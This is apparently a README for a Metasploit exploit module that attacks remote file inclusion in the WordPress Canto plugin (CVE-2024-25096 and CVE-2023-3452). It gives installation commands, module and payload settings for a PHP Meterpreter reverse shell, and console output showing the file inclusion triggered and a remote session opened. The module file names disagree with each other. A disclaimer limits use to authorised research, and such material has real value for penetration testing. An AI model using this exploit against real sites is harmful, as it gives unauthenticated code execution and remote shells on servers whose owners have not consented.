Share
## https://sploitus.com/exploit?id=C7832B1B-6942-527B-B1EA-23A67E559A65
# Metersploit exploit module canto RCE CVE-2024-25096 & CVE-2023-3452

This exploit is a proof-of-work exploit of the RFI vulnerabilities CVE-2024-25096 and CVE-2023-3452,
which allow the attacker to establish an interactive remote shell session on the target.

CVE-2024-25096 abuses the abspath parameter, which allows remote file
inclusion through the include_once statement.
CVE-2023-3452 has the same procedure, except that the “wp_abspath” parameter allpws remote file inclusion though 
the requiere_once statement.
This allows the attacker to execute unauthenticated code on the target server.

Although vulnerability databases list CVE-2023-3452 as affecting versions up to 3.0.4,
testing confirmed that the vulnerability remains exploitable up to version 3.0.6.
The issue was patched in version 3.0.7, the same version that fixes CVE-2024-25096.


## Requirements

The following conditions are required for the target to be vulnerable:

- installed canto plugin  Add new plugins -> Plugin Upload.


### Exploit Configuration
Add the exploit (```rce_exploit_cve_2024_25096.rb```) to metasploit module folder.
Start Metasploit (```msfconsole```) and reload Metasploit (```reload_all```).
Select the payload.

```bash
cp explit/wordpress_canto_plugin_file_include_rce.rb ~/.msf4/modules/exploits/
msfconsole
reload_all
search rce_exploit_cve_2024_25096
use 0
```
set the values of the required variables

```bash
Module options (exploit/rce_exploit_cve_2024_25096):

   Name        Current Setting            Required  Description
   ----        ---------------            --------  -----------
   Proxies                                no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, http, socks5h
   RHOSTS      127.0.0.1                  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT       8889                       yes       Port
   SRVHOST     0.0.0.0                    yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT     8080                       yes       The local port to listen on.
   SSL         false                      yes       Use SSL
   SSLCert                                no        Path to a custom SSL certificate (default is randomly generated)
   TARGETFILE  get.php                    yes       Vulnerable PHP file
   TARGETURI   /wp-content/plugins/canto  yes       Path to cantos root directory
   URIPATH                                no        The URI to use for this exploit (default is random)
   VHOST                                  no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.178.58   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   WordPress Plugin > run
[*] Started reverse TCP handler on 192.168.178.58:4444 
[*] Starting HTTP server...
[*] Using URL: http://192.168.178.58:8080/14Gs3AAu8j4
[*] Triggering RFI...
[*] Sending admin.php payload
[*] Sending stage (42137 bytes) to 192.168.178.58
[*] Meterpreter session 2 opened (192.168.178.58:4444 -> 192.168.178.58:54310) at 2026-03-01 20:15:23 +0100
[*] Server stopped.

(Meterpreter 2)(/var/www/html/wp-content/plugins/canto/includes/lib) >
```

## Disclaimer

This project is provided for educational and security research purposes only.

The author does not encourage or condone illegal activities. Any use of this code for attacking systems without permission is strictly prohibited.

The author is not responsible for any misuse or damage caused by this software. Users are responsible for ensuring that they comply with all applicable laws and regulations.

Use this code only in environments where you have explicit permission, such as lab environments, penetration testing engagements, or security research.